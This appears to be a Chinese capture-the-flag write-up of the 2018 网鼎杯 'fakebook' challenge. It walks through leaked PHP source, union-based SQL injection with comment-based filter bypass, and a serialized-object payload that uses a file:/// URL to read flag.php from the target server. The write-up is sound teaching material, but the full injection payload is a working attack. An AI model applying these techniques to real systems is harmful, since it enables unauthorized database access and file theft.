前言:我曾经有一个梦想,但它养活不了我和我的家人,所以我换了一个梦想。

扫描存在robots.txt,里面存在user.php.bak源码

源码,其主要意思就是获取url,不能响应返回404,存在就执行下面的语句。输入的blog为网址。

<?phpclass UserInfo
{public $name = "";public $age = 0;public $blog = "";public function __construct($name, $age, $blog){$this->name = $name;$this->age = (int)$age;$this->blog = $blog;}function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}public function getBlogContents (){return $this->get($this->blog);}public function isValidBlog (){$blog = $this->blog;return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);}}

在注册时候,blog一直提示错误,审了代码才知道要填入网址,并且着网址还得真实存在。不过通过英文blog博客,也大概能猜到。

点击admin,加入‘,发现抱错

字段为4

此处过滤了select,可以使用/*!select*/或者/**/内联的方式去绕过。原因是这个位置的过滤

2处存在回显点

查询到库名为fakebook
表名为users

users列的信息

拿到用户名密码

来到这里,连个flag的影子都没见到,哈哈这里只是纯粹的怀念一下联合注入。
在路过的时候发现一个data的列,查看,发现有点像反序列化。

而这里,the contents of his/her blog对应着data的数据,不知道为啥要摆在第四个,真的是因为data处于第四列?构造payload,记得修改s的数值。

http://220.249.52.133:59462/view.php?no=-1/**/UNION/**/SELECT/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:23;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#



flag{c1e552fdf77049fabf65168f22f7aeab}

读取view.php源代码,

2018王鼎杯-fakebook-详细解说相关推荐

  1. 2020年王鼎杯反序列化题目复现

    1.think_java.   这道题目是道综合题,考了代码审计.sql注入.反序列化等知识点. 题目描述如下:   下载题目附件,发现是java程序,使用jd-gui进行反编译,如下图:   发现t ...

  2. [网鼎杯 2018]Fakebook

    [网鼎杯 2018]Fakebook 点击添加两条记录之后,任意点进去观察到 http://b996c614-1897-4c97-a331-05d75922d627.node3.buuoj.cn/vi ...

  3. [网鼎杯2018]Unfinish

    [网鼎杯2018]Unfinish 盲猜register界面 打开看什么都没有. 二次注入类题目 绕过方法: ​ mysql中,+只能当做运算符. ​ 执行select '1'+'1a'时 结果 执行 ...

  4. BUUCTF__[网鼎杯 2018]Fakebook_题解

    前言 前天上午去报名了初中辅导老师,下午收到暑假可能可以回学校学习...真就尴尬.如果可以,回还是不回. 参加了2020年的网鼎杯,签到杯,神仙打架,萌新不配参加,下次一定. 读题 这题有点意思,虽然 ...

  5. 【CTF WriteUp】网鼎杯 青龙组 Misc题解复现(整理,WP非原创)

    (原本还打算四场Crypto全刷的,结果第四场被教做人了,算了整理点别的当补偿了) (另:求白虎组 Misc-boot 的 WP) Misc 虚幻2 图片在RGB信道各有一张图,提出来 R: G: B ...

  6. php跳水比赛,2018年“迎春杯”海南省青少年健身游泳比赛成功举行 前奥运跳水冠军许艳梅见证海南游泳健儿风采...

    颁奖现场 爱动体育讯3月3日上午,2018年"迎春杯"海南省青少年健身游泳比赛在海南迎宾馆游泳池举行.原奥运跳水冠军许艳梅,海南省体育总会主席陈亚俊,海南省体育总会副主席兼秘书长叶 ...

  7. 2022网鼎杯青龙组wp

    本次网鼎杯的Crypto部分其实还是比较简单的,解出的人数也较多.感觉405题略难一些,花了比较多的时间,恰巧最后几小时给出的162所用到的求解方式之前遇到过,有幸作为一个CTF新手把这次的比赛密码学 ...

  8. BUU刷题记-网鼎杯专栏2

    title: BUU刷题记_网鼎杯专栏2 date: 2001-07-16 18:30:26 tags: [addslashes().二次注入 漏洞,gbk编码导致的宽字节注入漏洞,.git文件泄露及 ...

  9. 网络安全的“奥运会”——第三届“网鼎杯”网络安全大赛即将开幕

    乘风破浪潮头立,为国铸鼎正当时!以"数字未来,共同守护"为主题的2022年第三届"网鼎杯"网络安全大赛如约而至.大赛由公安部指导,"政产学研用&quo ...

最新文章

  1. 2021年大数据Kafka(一):❤️消息队列和Kafka的基本介绍❤️
  2. 1003 我要通过! (20point(s))
  3. python所有函数用法_python函数用法总结
  4. nokia x7 android 9.0,诺基亚X7升级Android 9.0系统
  5. [android] 手机卫士设置向导页面
  6. 【10天基于STM32F401RET6智能锁项目实战第2天】GPIO与寄存器
  7. 大学c语言基本程序,一个大学C语言试题的简单实现--员工信息管理程序
  8. 【PAT甲】1006 Sign In and Sign Out (25分)循环模拟
  9. nodepad++通过正则表达式,删除带有特殊字符的某一行
  10. 【layUI时间控件使用】:按钮显示时间并放到输入框
  11. 记一次阿里云面试心得
  12. 快手公布于香港联交所主板上市计划详情,拟融资394.77亿港元
  13. C语言动态开辟多维数组空间
  14. XSSFWorkbook下载excel表格
  15. TCP/IP:认识TCP
  16. Vscode好用的快捷键:批量文字修改快捷键选中相同内容快捷键
  17. 淘宝、京东、天猫商品名称数据集下载最新版本。包括中药、化学器材、摄影、动物、酒水、办公事务。
  18. 262. Trips and Users
  19. Spring创建Bean的基本步骤
  20. linux内核源码分析之设备驱动

热门文章

  1. WordPress批量添加、修改、删除自定义字段的sql命令
  2. 阿里巴巴2015秋季校园招聘研发工程师在线笔试题
  3. BZOJ4755: [JSOI2016]扭动的回文串——题解
  4. Python_pymysql
  5. 【深度学习前沿应用】目标检测
  6. bash破壳漏洞分析(一)
  7. Spring Boot 开发环境热部署(HotSwap)详解
  8. 用python制作飞机大战_Python制作AI且mini版飞机大战
  9. python requests的作用_requests session的作用
  10. 【转】小生我怕怕工具包[2010.06.17](转自52破解论坛)